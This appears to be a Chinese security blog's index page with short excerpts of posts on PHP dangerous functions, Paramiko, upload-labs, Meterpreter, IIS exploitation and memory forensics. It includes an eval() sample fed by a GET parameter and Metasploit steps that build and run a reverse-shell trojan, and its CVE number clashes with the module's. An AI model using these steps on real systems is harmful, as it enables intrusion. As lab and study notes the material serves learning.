# PHP 常见危险函数 # eval () 函数 定义和用法: eval () 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 123456789<?php$var = "var";if(isset($_GET["cmd"])){ $arg = $_GET["cmd"]; eval("\$var = $arg;"); echo "\$var...

# Paramiko 模块介绍 ssh 是一个协议,OpenSSH 是其中一个开源实现,paramiko 是 Python 的一个库,实现了 SSHv2 协议 (底层使用 cryptography)。 有了 Paramiko 以后,我们就可以在 Python 代码中直接使用 SSH 协议对远程服务器执行操作,而不是通过 ssh 命令对远程服务器进行操作。 由于 paramiko 属于第三方库,所以需要使用如下命令先行安装 1pip3 install paramiko paramiko 包含两个核心组件:SSHClient 和 SFTPClient。 SSHClient 的作用类似于...

# upload-labs 通关记录总计 # Pass-01 (前端绕过) 12三种方法:前端绕过,jpg改php,删除"return checkFile()" 题目源码 1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "")...

# meterpreter 学习笔记总结 # 系统命令 123456789101112131415background # 将当前会话放置后台sessions # sessions –h 查看帮助sessions -i <ID 值> #进入会话 -k 杀死会话bgrun / run # 执行已有的模块,输入 run 后按两下 tab,列出已有的脚本info # 查看已有模块信息getuid # 查看当前用户身份getprivs # 查看当前用户具备的权限getpid # 获取当前进程 ID(PID)sysinfo # 查看目标机系统信息irb # 开启 ruby...

# Windows 内核提权 Cve-2016-7269 低权限提权 第一种方法 利用模块进行渗透 123use exploit/windows/iis/cve-2017-7269set rhosts IPexploit 发现是 windows 低权限,限免进行提权 # 生成 exe 上传反弹木马 生成反弹木马 123msfpc windows 本地IP 3333mv windows-*.exe 1.exemsfconsole -r windows-*exe.rc 上传 1.exe 到 C:/1 / 下,进行反弹 1execute -f 1.exe 1利用run...

# 内存取证 # volatility 使用: # 获取内存镜像的摘要信息 1volatility -f mem.raw imageinfo 判断系统版本应该是 Win7SP1x64 # 查看进程信息 pslist 可以直接列出运行的进程,如果进程已经结束,会在 Exit 列显示日期和时间,表明进程已经结束 1volatility -f mem.raw --profile=Win7SP1x64 pslist # 查看隐藏进程 12volatility -f mem.raw --profile=Win7SP1x64 pstreevolatility -f mem.raw...